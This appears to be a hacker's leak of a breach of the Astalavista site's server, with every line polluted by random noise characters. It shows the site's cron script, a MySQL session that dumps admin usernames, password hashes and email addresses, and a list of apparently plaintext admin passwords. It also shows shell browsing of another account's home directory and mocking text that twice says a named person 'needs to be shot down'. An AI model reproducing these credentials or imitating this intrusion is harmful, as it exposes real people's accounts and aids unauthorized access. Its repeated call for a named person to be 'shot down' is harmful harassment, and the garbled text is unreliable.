Y+ J+ X# [; {4 Q7 L- h5 g) p <channel>! ]) D$ A0 K5 L, b: c2 C+ E5 ?" }4 d
<title>ASTALAVISTA.com - Exploits</title>2 b' `! R/ F% k4 R3 F
<link>http://www.astalavista.com/exploits</link>; l) c9 Q- V5 L$ G" Z% Y- N2 m
<description>All availably Exploits.</description>
2 y) L" X2 ]! h7 Y9 b9 Z+ } <language>en-us</language>
7 V8 A& h2 Z4 a) @# y h <lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>
. _: o& s9 ?. P- H, R <docs>http://blogs.law.harvard.edu/tech/rss</docs>
( m' A+ j p1 q% e) ?2 T, E <generator>Astalavista.com</generator>8 b& I. ?1 k# a( p! y3 Y( b
<webMaster>info@astalavista.com</webMaster>’ . $items . ‘9 z4 Y8 _9 x" Q% b
</channel>
" K+ J( {( m. `4 O" }</rss>’;# }3 }; F6 g8 X$ e
$ d. {0 e4 _) Q' W/ J: J
if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {
* F. }- Z- X0 F# W9 o1 Y unlink (FULLPATH . ‘/feed/exploits.xml’);3 W, Y" X2 U! U5 M
}
, z4 E5 c$ ?2 L6 H% h$ j/ m
$ d) S* H: m4 B) h8 A6 V$ g8 d file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);" S0 P0 {4 |, W% E
[snip]% J y) B1 j7 |: s' V5 W
) k) |- \8 P0 @0 K! N
sh-3.2$ cat exploits.sh
B$ x& U5 ~) N& E, p* F6 W8 H0 T#!/bin/sh9 C L* J; d* y3 U/ c
4 U8 p# l, I) z' {###########################################################- l2 p% Y' n( x7 N3 }( \
# #
' h0 d5 S; L+ Z2 q! C" F) r# Title: milw0rm exploits adder #
3 D3 I6 \" C7 b' s9 G: I# Description: Add all milw0rm exploits to the #
* J7 ^$ [% c) I/ T+ W4 ]* T# Astalavista.com database #+ p$ p. [/ ?6 Q! | _: b
# #
* d5 X- p: @. a& _ u1 O# Company: Astalavista Group #; F, h `# ?' }7 K, v# l, T& B
# Author: Paulo M. Santos #3 x; F% V9 u* S$ g5 M, h
# E-Mail: 链接标记paulo.santos@astalavista.ch #1 @1 V6 t# K! N2 p4 j, H) H k, U T
# #
; ^# d% I0 _. G7 \9 Y2 s. n, F3 A* y###########################################################
0 Q7 l2 K" z& j$ Y1 G) v m0 n2 h9 \2 j% ?; } \
# path6 D+ l: R; x4 `' W7 ]% [- [
this_path=/home/com/public_html/modifications/cronjobs1 Z) Z% M) u: ^: f! ?( i" \; N4 v
& N0 l. j% F( t* E7 q# change directory
' A. c' w/ u9 R& t2 ]3 y* Ncd $this_path
, r1 j4 S; Q- S. i. }cd tmp/
w0 A |; W+ C& k
4 v1 T& m2 e1 C# delete files0 d) ]2 v8 Q$ K9 D0 \" D1 S4 |" y
rm -rf milw0rm.tar.* &. J* P/ f! ~7 o% b1 z, a1 q
rm -rf milw0rm/ &
: c$ h5 F! n; u
+ w' [. i: @) L3 C! r- u4 F( W# wget milw0rm paket
) P& v! b* J# Y1 Awget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]
3 W1 Z! w3 H; f( v! X9 B
* C6 @; `7 j4 I# extract milw0rm paket% _: _. @" {, M2 {8 h9 V2 @2 B; S
tar -xvf milw0rm.tar.bz2
- k U/ d6 {4 \( e1 H! i: u- y! V, i! W) w
# change owner6 }( M! h0 O9 f# V, y' M
chown -R com .
* h4 N: e' p8 y& X( p4 dchgrp -R com .2 T; A: b6 ^' C- Q
, }2 _5 q$ L* J( |" x
# execute php script
5 y! |. o% I8 P$ ]6 x# q6 Zcd $this_path
9 T4 l, X0 G' e4 W h$ M, o5 r( xphp -q exploits.php7 D& R) X$ R. F) M
$ t* {4 H J2 e% L- [- |0 |1 J# delete files
: ^. b% j8 i* s/ F/ grm -rf tmp/milw0rm.tar.** }! L. T# E+ }1 \# a; H' V
rm -rf tmp/milw0rm/
0 ^7 S9 V+ b9 [* E) |, {! ]
" r* w/ |% S, Csh-3.2$ echo “Paulo M. Santos needs to be shot down.”
8 e* ~* z% X) V. W" xPaulo M. Santos needs to be shot down.; _) j% _: S' [7 Z' t+ V3 e- G+ X; L
' M5 h% H0 ?% }! Jmysql -u contrexxuser2 -p4 s' \9 e# k* r; b1 Q! `0 K
Enter password:! Z' d. [+ s* F# Z8 N
Welcome to the MySQL monitor. Commands end with ; or \g.
0 P3 x9 I" h. ~" X) v, S6 yYour MySQL connection id is 261694
* l1 ~+ v3 x/ LServer version: 5.0.45-community-log MySQL Community Edition (GPL)
( n4 X# E. }; {( L3 n4 ^- k9 u
5 V7 O' @' ^) a7 `( w( v% EType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.# K, p/ c9 @# K& _! m6 m2 \% E9 I
8 P% y& p1 t# `3 y( w
mysql> show databases;
' @. \) j/ ]2 X5 K* w* m$ `+——————–+
- X/ A' m" N% ]7 Q1 L, B| Database |
7 w' E! ?* X- f1 \. n+——————–+
+ i; Y1 u6 a) }6 B) s: Q; p! ^6 T| information_schema |, w) q1 c5 ~6 ~4 [1 S- ?% ?
| com_contrexx2 |
2 X( n5 h+ A3 f0 L" [) R2 R| com_contrexx2_live |
# d4 f3 J1 Q% D! o5 s( z| test |. j6 W4 _- x9 o, L5 n3 M
+——————–+
$ y6 W7 _' ~2 V% p4 rows in set (0.00 sec)' m& `4 M1 K4 P! A/ j$ J4 ]7 r0 l/ `
* @( l* P T$ e8 v; J q1 T0 p6 Cmysql> use com_contrexx2_live
" [' y# C6 N7 R8 w6 fDatabase changed
5 A% M5 R/ D: Wmysql> show tables;
7 Q' o( J* M# I7 Z' ]+————————————————–+* [) r, e* H1 Y5 G; E" _: g) v4 S
| Tables_in_com_contrexx2_live |
4 b$ K& I9 O" l F8 Z3 v+ Q$ I5 ^+————————————————–+8 \# I# i E, W/ L( z+ H
| cc_banner_counter |
8 @5 I: ^# h, f4 E2 l6 L| cc_search_counter |1 W# Q ]8 L9 w4 {! z3 t
| contrexx_access_group_dynamic_ids |- u& i. u" p. k
| contrexx_access_group_static_ids |+ C* I2 r9 O1 g% w6 L: G
| contrexx_access_rel_user_group |. d* B8 \2 F% i! G2 B' j
| contrexx_access_settings |+ q9 ~! @9 r) N- I- I+ x
| contrexx_access_user_attribute |! ~0 V) L8 z" T3 P1 g1 F& n
| contrexx_access_user_attribute_name |
8 b; E- w9 k0 {! f+ p6 W| contrexx_access_user_attribute_value |
, k! E; X% |/ j) T. I( Q- N| contrexx_access_user_core_attribute |- e6 b, ^& j, u/ b, u8 F7 X6 H
| contrexx_access_user_groups |( l/ s5 L3 Q+ B! P; d& `
| contrexx_access_user_mail |
! B" L# T7 G0 J$ I5 B1 Z8 F| contrexx_access_user_profile |$ j! }* h- \* x
| contrexx_access_user_title |
3 O ^! b- ?9 |- M; K; r| contrexx_access_user_validity |
! `( |) [# @! V0 c2 n9 Q# q| contrexx_access_users |
2 f3 k+ I! ], a' g0 u) U| contrexx_backend_areas |
; x+ K4 x2 J; E/ H" b| contrexx_backups |
+ I' O4 P+ A) V3 S+ T. || contrexx_content |( }+ o% X3 ]. ~0 ` |
| contrexx_content_history |" d+ E- I/ T4 i1 s+ D* |' @
| contrexx_content_logfile |
& M( v" t( A. E| contrexx_content_navigation |
9 T, l5 w; J( X% `. x| contrexx_content_navigation_history |) ]7 M. l/ B3 Z! o
| contrexx_ids |
- q; h9 _2 H/ k" K& c5 H( j+ h| contrexx_languages |
- o6 H Q K! y/ }| contrexx_lib_country |
/ @8 } o" K. E7 a| contrexx_log |
+ C& B7 k) E& ?: z% [ o( h$ k| contrexx_module_alias_source |
! n, q2 n2 U. T$ O0 |0 j$ e| contrexx_module_alias_target |
; {$ r) W5 m) y8 c ], N+ X: F| contrexx_module_block_blocks |
0 ^5 n J- M! D" h" [| contrexx_module_block_rel_lang |
5 R6 n, I5 q+ d* k2 t| contrexx_module_block_rel_pages |- V( g( y9 Z0 E2 R) B1 I
| contrexx_module_block_settings |
$ L, {6 }- K4 L& U4 [" W# E| contrexx_module_blog_categories |
! T# O |0 |5 d1 T/ A7 ^2 I, B| contrexx_module_blog_comments |3 Q9 g( I! T! o( [4 t: ^
| contrexx_module_blog_message_to_category |
" ^7 C$ G5 `- K* K& j) x8 q| contrexx_module_blog_messages |& b& G/ V |+ s( J4 d& f4 U
| contrexx_module_blog_messages_lang |& C+ l: ^. X, D$ U2 f
| contrexx_module_blog_networks |* h0 D. e" \: p" C
| contrexx_module_blog_networks_lang |
: J; F! C) n# ~# X| contrexx_module_blog_settings |- E; ]+ G( ^, d5 j4 e+ j
| contrexx_module_blog_votes |
# J% R: o- `! a5 R| contrexx_module_calendar |8 Y) {' a! m# U1 \
| contrexx_module_calendar_access |
* B7 N9 E5 Z5 I* x) H8 U| contrexx_module_calendar_categories |
/ E4 E, F: m7 o| contrexx_module_calendar_form_data |0 ]% v8 [9 e% f% c
| contrexx_module_calendar_form_fields |) g, X9 D# t! }. i: Y; r
| contrexx_module_calendar_registrations |; P2 c8 ~. N& \1 H: X& w
| contrexx_module_calendar_settings |
5 E6 B5 t5 w. B& L7 F; p- e| contrexx_module_calendar_style |2 p/ l9 {$ T% L; x/ s; V
| contrexx_module_contact_form |
; M( |1 T/ r/ n$ Q* C! u| contrexx_module_contact_form_data |
2 B) N6 E1 x! d! Y- [, Z| contrexx_module_contact_form_field |1 D& ?7 q, i" C
| contrexx_module_contact_settings |
1 f9 P( K$ ^' K' V| contrexx_module_data_categories |
* {) v+ O# y) H R| contrexx_module_data_message_to_category |
/ R% b, d9 A f- S* p" x| contrexx_module_data_messages |, E2 r9 }7 X% @' N* j
| contrexx_module_data_messages_lang |
~& s) P; E0 R# P$ Q7 t| contrexx_module_data_placeholders |% L( o k4 V3 U3 Q1 b7 B
| contrexx_module_data_settings |
; X9 ?+ [" v8 s| contrexx_module_directory_access |2 ^4 F* o* }) y$ C. s( _
| contrexx_module_directory_categories |
3 a% b" @# X, M) Z* D; s) E! b| contrexx_module_directory_dir |7 h0 y( N6 z' c
| contrexx_module_directory_inputfields |; m& O0 X, g6 [. m& @3 s, d2 l n
| contrexx_module_directory_levels |
6 R2 e2 [ J% o1 ^) h| contrexx_module_directory_mail |
" Y: r5 q) m% N; T z: J1 J| contrexx_module_directory_rel_dir_cat |8 `) }- o7 d/ S% g; S! G; }2 O
| contrexx_module_directory_rel_dir_level | G. v, u. V& v- u
| contrexx_module_directory_settings |# w% C* b. w" m5 {
| contrexx_module_directory_settings_google |
! o. R2 p1 b, c( T) ?4 ^| contrexx_module_directory_vote |' U2 G) z! {( U0 H7 R
| contrexx_module_docsys |( z3 S: M7 ?$ I* ]
| contrexx_module_docsys_categories |
}0 [* h" R' B6 q/ U, \! F| contrexx_module_egov_configuration |8 d) H* Y2 Y) C5 w0 c e; G
| contrexx_module_egov_orders |
, Z* ]! ^( S1 n. Y8 h| contrexx_module_egov_product_calendar |& Z; Y; N1 W& X' y
| contrexx_module_egov_product_fields |
* F' {; N1 R1 S8 [| contrexx_module_egov_products |
: P0 ] J) }. Y; b- L| contrexx_module_egov_settings |
0 [; E( x; w+ z3 _6 D, _| contrexx_module_exploits |+ t* v4 s6 T5 ^/ A
| contrexx_module_exploits_categories |. @ X+ o( i2 k5 a9 Y
| contrexx_module_feed_category |
* D; R7 d5 v! a| contrexx_module_feed_news |( a- |& w3 ?3 K! B, B$ P& H2 G0 G
| contrexx_module_feed_newsml_association |
9 U4 g' S' [8 A g/ Y; L| contrexx_module_feed_newsml_categories |, t% k/ H/ e# ?! u# E+ W, ]$ y
| contrexx_module_feed_newsml_documents |8 }' c/ H) T2 I/ i1 g- [1 S
| contrexx_module_feed_newsml_providers |
% \* e& L; f" ]2 h f| contrexx_module_forum_access |: t( F5 r8 o. F. D+ d4 }5 e
| contrexx_module_forum_categories |
l2 D( o- ~. M1 w$ G) s( Q| contrexx_module_forum_categories_lang |2 {2 v" T) \- o8 v( u
| contrexx_module_forum_notification |2 \1 v: P: C! N: F) S
| contrexx_module_forum_postings |( x9 F( Q) Q; e: {1 }
| contrexx_module_forum_rating |6 Q: q7 k2 D" Z( W3 t O
| contrexx_module_forum_settings |
+ l; p* J; O6 i| contrexx_module_forum_statistics |
" ~4 e% V' D6 i" E. F! q| contrexx_module_gallery_categories |* {7 s3 u# r) v* S
| contrexx_module_gallery_comments |! K0 m3 B% V7 M4 Y* h: K
| contrexx_module_gallery_language |
# N7 v! g" @1 @- B# r| contrexx_module_gallery_language_pics |$ e% X2 t4 \8 V+ F/ u4 L
| contrexx_module_gallery_pictures |6 K+ C) q/ C' Y: \% R3 Q
| contrexx_module_gallery_settings |
. H' f( A, K+ ]/ n) z" w| contrexx_module_gallery_votes |
0 ?1 }7 h Q" m$ M| contrexx_module_guestbook |% b2 Q3 R ^0 I y, s+ p
| contrexx_module_guestbook_settings |
2 f# {' i2 f& q| contrexx_module_livecam |$ q1 K2 }7 N1 I0 A" k6 Y
| contrexx_module_livecam_settings |
2 t# P/ N* ~/ p) N9 n' L4 f| contrexx_module_market |
# s' A: @: i3 V7 y7 _| contrexx_module_market_access |; P# y: E& ^/ h, Y } t
| contrexx_module_market_categories |
) w C( P/ V/ G$ J| contrexx_module_market_mail |
9 n% k+ d" E; B, j; B7 p# p: s| contrexx_module_market_paypal |
. A' R9 [& Q4 X& j" y2 Z! f8 t! L| contrexx_module_market_settings |$ h. W) w# q7 T) d# ?
| contrexx_module_market_spez_fields |
/ q1 F# g; n0 k" J0 S5 }" K| contrexx_module_mediadir_access |; F, P/ e( e" v; N' d$ Q
| contrexx_module_mediadir_categories |
% s$ O' z- ]( }1 y7 a/ r& S3 F| contrexx_module_mediadir_comments |9 `4 u4 J2 C$ [, D3 A
| contrexx_module_mediadir_dir |: w* k {; g* v+ }4 c5 L/ X
| contrexx_module_mediadir_inputfields |
# g5 ^# |0 J: U' V| contrexx_module_mediadir_levels |8 a+ Q: i+ H: ~4 ~% V: M- H9 @( [
| contrexx_module_mediadir_mail |
9 a ?5 \- Y J; g, K' g4 k| contrexx_module_mediadir_rel_dir_cat |
* E. {& N; d4 w! v/ A# || contrexx_module_mediadir_rel_dir_level |
1 |3 {' L; z& p. Q0 h| contrexx_module_mediadir_reports |# Q5 G+ h3 v; r: E J S
| contrexx_module_mediadir_settings |
R. `3 u" b/ z| contrexx_module_mediadir_settings_google |0 P" A/ c2 g2 m( g- f4 P
| contrexx_module_mediadir_vote |
# x E3 P' {' z| contrexx_module_memberdir_directories |1 w+ E7 o2 [; W, p# s
| contrexx_module_memberdir_name | J0 p& |% n0 g
| contrexx_module_memberdir_settings |
m; `5 H8 E9 O) g| contrexx_module_memberdir_values |
' `5 O' M4 m& {/ h) H" T/ \| contrexx_module_nettools_allowed_groups |
: ` P+ L% _& C5 v) D, N| contrexx_module_nettools_settings |
# _0 G0 Q6 _& m+ b; i| contrexx_module_news |0 O3 H" [: E* |5 B/ Y6 i
| contrexx_module_news_access | t; r* d9 r% M8 [
| contrexx_module_news_categories |
! E8 M, D( O# q7 W1 u8 X2 _+ f| contrexx_module_news_settings |
9 D7 i! P/ T3 s" A8 b| contrexx_module_news_teaser_frame |# y& |) w" r, k
| contrexx_module_news_teaser_frame_templates |& D9 \% U$ A- F
| contrexx_module_news_ticker |
, N: ~7 [2 p$ d. y| contrexx_module_newsletter |
( l/ a0 }& L" d' F. O7 d6 N1 t| contrexx_module_newsletter_attachment |8 w1 y" X- ]$ g) w% E
| contrexx_module_newsletter_category |( w1 E7 m G7 K
| contrexx_module_newsletter_confirm_mail |( z8 B+ C9 T# E
| contrexx_module_newsletter_rel_cat_news |3 d5 g& X3 y9 c% b0 ?6 @
| contrexx_module_newsletter_rel_user_cat |, H- t) D) i7 L2 v' A+ b
| contrexx_module_newsletter_settings |/ Y2 f5 i$ m! }
| contrexx_module_newsletter_template |1 q6 H: a; V; f" B
| contrexx_module_newsletter_tmp_sending |- \3 z% G) W: n( r, Z: P
| contrexx_module_newsletter_user |
( b7 {( H! \3 E| contrexx_module_newsletter_user_title |
5 a. v. X% @/ U& {' y; w| contrexx_module_onlinetools_defaultports |- d9 o4 I8 Y m# s2 y+ b
| contrexx_module_onlinetools_defaultports_back |
! P! ^1 ]6 K# @: G1 g% V0 R( X| contrexx_module_onlinetools_geolitecity_blocks |
4 D7 |4 z" [8 o6 k| contrexx_module_onlinetools_geolitecity_country |
@: c" U, M; o2 R1 C' N6 w| contrexx_module_onlinetools_geolitecity_location |; t, F e; ^" P. W0 S% [
| contrexx_module_podcast_category |
! j! @: z2 T6 p) w! x. ^5 H2 Q! Z8 g| contrexx_module_podcast_medium |
9 g/ v2 s T4 e; V% p| contrexx_module_podcast_rel_category_lang |
& `% Y1 I# u* j" `6 o- u+ Y; g| contrexx_module_podcast_rel_medium_category |
( I; P: B5 V, z( Y; K( G' o| contrexx_module_podcast_settings |$ @* E+ T( N' \$ X! ]% }2 D( M
| contrexx_module_podcast_template |9 l. L" Q( |- L5 r- |1 C
| contrexx_module_proxydb |
6 o! }7 S0 G6 R5 F| contrexx_module_recommend |1 E; j& |; j. \2 Q3 o# k N3 B3 {+ D
| contrexx_module_repository |
2 N# P1 V7 o* B, P! O. O; D| contrexx_module_securitynews_cats |) G" i6 q/ Z5 q7 ?& V1 G
| contrexx_module_securitynews_feeds |
) x+ M0 ^' s% Q# `# y) l) z| contrexx_module_securitynews_news |
, F- f( \6 G1 O, Y+ L* v| contrexx_module_shop_categories |
4 ^) Z. r% B4 s2 g- B( o| contrexx_module_shop_config |( t* n& i0 `5 j1 q, c
| contrexx_module_shop_countries |' C& e! D& ^* ^! S+ N1 ~4 o% ?0 r
| contrexx_module_shop_currencies |
. j6 C1 O% X8 K6 g& j# P| contrexx_module_shop_customers |4 V% h y# W$ E8 R; ]7 [& ?1 e
| contrexx_module_shop_importimg |
' u0 h0 k6 b; x/ N| contrexx_module_shop_lsv |
% w# f7 P9 Q5 k% M9 u ^5 G| contrexx_module_shop_mail |9 ]/ T& z% }7 H3 a& h
| contrexx_module_shop_mail_content |
; F( w I2 U2 k6 C T$ h| contrexx_module_shop_manufacturer |* \$ n @; | l9 C# j$ f
| contrexx_module_shop_order_items |1 G8 M/ X& i7 s* Y6 b& G
| contrexx_module_shop_order_items_attributes |! c! }7 ]( v+ g3 c
| contrexx_module_shop_orders |2 x9 F/ D2 v# K! s4 F2 `: S9 ~
| contrexx_module_shop_payment |. x3 W5 U3 B: C" V G2 u- Z0 O, r
| contrexx_module_shop_payment_processors |
& @ y( U( s1 @, T3 s, A| contrexx_module_shop_pricelists | p: t {$ U( i& O- K
| contrexx_module_shop_products |
7 W( V- f+ _* T! ~, y| contrexx_module_shop_products_attributes |
) V$ l! b$ g% R3 D6 L| contrexx_module_shop_products_attributes_name |; s+ r s% j0 S2 ]
| contrexx_module_shop_products_attributes_value |
4 j' u# P1 v1 o5 a: J7 I+ w| contrexx_module_shop_products_downloads |
5 T9 I, T" z b2 A2 Z h) [| contrexx_module_shop_rel_countries |3 |% F, E/ Z( A: ^: O. C0 t
| contrexx_module_shop_rel_payment |
, \+ M8 @" j6 `/ d| contrexx_module_shop_rel_shipment |
! y" @4 g: X" C' ?8 l| contrexx_module_shop_shipment_cost |
& N5 w# p4 H8 k& y- l5 k0 h' I- || contrexx_module_shop_shipper |, s' A1 M) n) f7 O
| contrexx_module_shop_vat |
8 H& J: }+ [& t. v4 Q1 || contrexx_module_shop_zones |
2 _. H* \: ]& n. h| contrexx_module_u2u_address_list |
; n" b+ R0 w: |3 B0 c| contrexx_module_u2u_message_log |
& D: U6 F; o: j$ c& s) B| contrexx_module_u2u_sent_messages |. n2 N8 \2 M* T6 x$ g2 O
| contrexx_module_u2u_settings |
4 w* a9 B( V; J' g# j% C; ]| contrexx_module_u2u_user_log |
$ C+ Z/ ^( D5 I| contrexx_modules |' [) p+ p+ X- b2 f9 n- x2 L
| contrexx_sessions |
/ a: u9 L4 \& o) Z; l" z| contrexx_settings |! r3 U" N! O& C, g7 y. o
| contrexx_settings_smtp |
Q! m n5 w F: `6 L, g| contrexx_skins |
6 U2 s+ S7 n8 N$ J" [5 Q| contrexx_stats_browser |$ q7 P: t- A0 F& a h, K
| contrexx_stats_colourdepth |
9 p/ U9 t C2 \1 [8 I; C| contrexx_stats_config |
* b& y% F r; I3 Q4 j| contrexx_stats_country |1 z& j* W o/ w: V# D: E6 ]
| contrexx_stats_hostname |
" U' V' j" C2 @| contrexx_stats_javascript |+ ^# R' w# }) q6 y7 u* D% e
| contrexx_stats_operatingsystem |
9 i5 [+ u% c3 h& M| contrexx_stats_referer |
0 e& N8 E1 ~, V: z1 h: ~6 R# v' E| contrexx_stats_requests |
6 x8 ]; B# Z' k+ s7 j- u0 u0 k| contrexx_stats_requests_summary |" G1 t; Z& j# |) q
| contrexx_stats_screenresolution |
+ S# |& |* V3 C7 ?5 v| contrexx_stats_search |: y0 D1 F6 F: \9 D: n
| contrexx_stats_spiders |% r# o1 `; `) p2 ?" z
| contrexx_stats_spiders_summary |0 ^- b( A- ?2 t$ K2 a/ q a
| contrexx_stats_visitors |
( j2 |9 \ x, i1 G& m| contrexx_stats_visitors_summary |& e) A. R( P. u7 y% j; N2 D
| contrexx_voting_additionaldata |1 P9 T+ A1 Z, i& c3 ~/ m
| contrexx_voting_email |
* `7 r1 ]4 Q! H4 l( f( n" V5 i- A| contrexx_voting_rel_email_system |
6 F. d6 r/ ^ P# \5 L8 q- O. X| contrexx_voting_results |' k# _8 |8 \/ n+ i$ m. Q0 w
| contrexx_voting_system |1 s) M/ ~5 j' |' @. C& d. B
| foo |0 n8 p0 m2 {+ P- @7 t- m5 k5 d
+————————————————–+
) ^+ a+ ]0 F2 l/ p( p% V3 }$ D227 rows in set (0.01 sec)
) F& a( P1 F* D' t
! a I' g& G; _" O& K: u- pmysql> select count(*) as skids from contrexx_access_users;
9 z7 o# o* ?6 d* W2 {+——-+4 K. P0 ^, U8 b+ h- D; u( O
| skids |; q5 V% k, [4 G$ @; g( X* J. n
+——-+7 S9 S& `/ G1 l% P& [
| 53699 |# u; M7 Q- z2 J9 U
+——-+
; e4 O6 F# U* J1 row in set (0.00 sec)
/ w. W& H% g1 _7 r6 m N" J5 q+ F. ]( g! t
mysql> describe contrexx_access_users;
( @! a+ u* Y3 P8 M! U4 r+——————+——————————————+——+—–+————–+—————-+2 y, W& Y) W# z4 Y9 ~( O$ L
| Field | Type | Null | Key | Default | Extra |! m, ]4 _" P+ B
+——————+——————————————+——+—–+————–+—————-+0 S3 _3 \* E. ^$ c2 J* u
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
& w) Y D N% C6 B$ c! T5 S* @6 R| is_admin | tinyint(1) unsigned | NO | | 0 | |" A: N( ?" G& a* G& r7 O) C
| username | varchar(40) | YES | MUL | NULL | |# T5 W2 B- e3 q
| password | varchar(32) | YES | | NULL | |) r( Q! Q* w# T2 ~
| regdate | int(14) unsigned | NO | | 0 | |; Q# K: g" P' I# v! S3 p
| expiration | int(14) unsigned | NO | | 0 | |
( V, Z! h) @ v2 r! T% e| validity | int(10) unsigned | NO | | 0 | |
3 q4 N8 u* V* v3 N' T| last_auth | int(14) unsigned | NO | | 0 | |. B' B- p# ?* N
| last_activity | int(14) unsigned | NO | | 0 | |
: h+ T( E0 P/ w3 f* k| email | varchar(255) | YES | | NULL | |& i8 u$ z7 C6 B' }( U" s
| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |
0 `$ Q1 `: W, O) I# L| frontend_lang_id | int(2) unsigned | NO | | 0 | |5 v! T# t5 c3 ]8 t R
| backend_lang_id | int(2) unsigned | NO | | 0 | |
# K% E: C- e" `0 B| active | tinyint(1) | NO | | 0 | |' R- E8 X$ |3 a- h D0 T/ O9 O
| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |
# c) Z1 d$ s- o& D| restore_key | varchar(32) | NO | | | |, t& q$ A4 x1 U, S- {) p' P
| restore_key_time | int(14) unsigned | NO | | 0 | |
8 o& e( ~1 @' w4 F5 o i& O& r| u2u_active | enum(’0′,’1′) | NO | | 1 | |
6 h: q1 \! H6 D6 C- Y+——————+——————————————+——+—–+————–+—————-+/ X3 N+ C8 ~0 M" E/ c& w
18 rows in set (0.00 sec)
) q' I0 [. j- H, }9 y$ n! q. ^7 u+ c% f! }) L7 n" Q
mysql> select username,password,email from contrexx_access_users where is_admin = 1;
+ D7 G* v* \+ r+————+———————————-+—————————–+& H( C3 T8 m& |7 ~) n& Q! n6 E* w
| username | password | email |, ?4 @1 T* a- r; _9 @
+————+———————————-+—————————–+
! j2 o |- @, a# e: t: Z| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |
+ d/ d. {2 J7 y% \! W3 v| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |
5 x- U% ^9 k% g' l* _+ H| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |# D) _# T' k& M6 L
| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |4 P# n, L# l2 M/ T2 l
+————+———————————-+—————————–+
0 l$ C, \) X2 u/ o4 rows in set (0.04 sec)* y3 X* j: m1 D- x# d
' I, _0 _, l8 [! x1 q& Qmysql> exit;
0 f k$ h& N# ^! gBye8 C d' C& J+ S! W' L
2 r6 B; i& |8 Z J) s. P[~] There you go, your “team of security and IT professionals” is a joke.0 J7 G; l A) x* p! n' |9 g6 X( o
1 I/ f5 Q3 B% D U+——————————+. O" R& e% u9 F
system:f82BN3+_*' z5 A# w0 X3 N6 J
Be1er0ph0r:belerophor4astacom
0 v0 {1 q7 q. A1 eprozac:asta4cms!
t+ g" g6 s- ?, n* [commander:mpbdaagf6m
h/ g" B* q! s8 i. u4 }! lsykadul:ak29eral
9 }* H( a% C6 c# ?6 e+——————————+
* C0 ^: n" q4 u7 j0 e) ^- c# q- [& ^+ A5 `" U3 i
[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)$ j) K4 ~! r" q% @. i
…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.
2 I6 [8 Y1 A/ w O* Z- J2 Y, ]! H$ l1 P7 i8 R4 u1 i/ ]! {9 n
[~] Lets move to astalavista.net now,6 x1 j, C/ C0 ]) ]; M" w+ J
9 e* f+ |, D3 a; _
From <链接标记[url]https://www.astalavista.net/[/url]>:
! \+ Z1 k0 }1 S" f* `( Q>> Everyone knows that the best defense is a good offense.
" V) N i0 y2 }0 Y9 `>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.2 @0 @5 E; s) @2 C" b5 w4 R: f
>> The ASTALAVISTA hacking & security community is the largest IT security community in the world." b# a8 @9 V X
>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”1 ~" t! \) m6 X+ u: z0 {/ G
, P: \4 L& Z: R8 Y3 ?>> Go ahead, try and hack our server . in a completely legal way!
: N! c; L" S; N( N6 Q>> Learn by doing: We offer our members tricky tasks and challenges on an
# G* ^0 L ]5 Z7 B8 u4 k>> ongoing basis so you can test your knowledge and abilities. You can also
3 `9 b" L9 l% W( X7 @>> demonstrate what you.ve mastered by taking part in regular hacker contests% \0 f( ?, i3 O9 R
>> and war games( f# u# n, Z3 k, i! A
% ]4 [$ L5 g8 ]3 `! f* d[~] Lets take a look there, after all… they are hack-proof, aren’t they?!
3 c4 T6 V6 G! V6 \9 O9 I
' b$ u7 D* n$ m/ ~( U; P2 b[-] Tricky task: Find home dir of astalavista.net# Z9 i( G! p+ t& P" J
0 W/ G) Q& ?& e6 }- Y- d) C ?' q8 s6 wsh-3.2$ ls -la ~astanet* Y/ J% E6 Y1 ~$ s
total 484 b* {& ^' H; Y4 ]0 r3 @
drwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .
5 Z3 I" l3 T$ [7 R Z+ Qdrwxr-xr-x 14 root root 4096 Mar 11 17:56 .., o% v. i' Z2 h* R4 U- w; g
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth3 u7 ], ^3 Y$ o2 H0 x: l6 D
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
( }, n6 \5 m/ E ?+ `-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
5 F4 S) c* d( |4 B3 o5 O* E-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile# _! k. U* A! h7 i S! O% M
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
1 A' s) A5 W5 L' z4 gdrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains5 P# P8 e: M2 m# X# e* j" W
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
: B9 @2 w8 N/ U+ l8 ^* Y/ Jdrwx—— 2 astanet astanet 4096 Dec 23 12:18 mail, ?5 b& d. V/ q+ B. C2 E
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
4 k; [, g" u/ ^! d+ @9 ^-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow J# a' A1 X8 ~7 s4 h0 e# P
3 g/ R5 U# F0 |( f1 O% m
sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
% c: H. e: w; S: e* Z5 Wsh-3.2$ ls -la/ u' B: L9 z/ A
total 200
* r, }6 f/ W. l6 d. f7 N/ e, tdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 .
2 f, D, H. t! g4 B0 r& V- L( O" d" Idrwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..
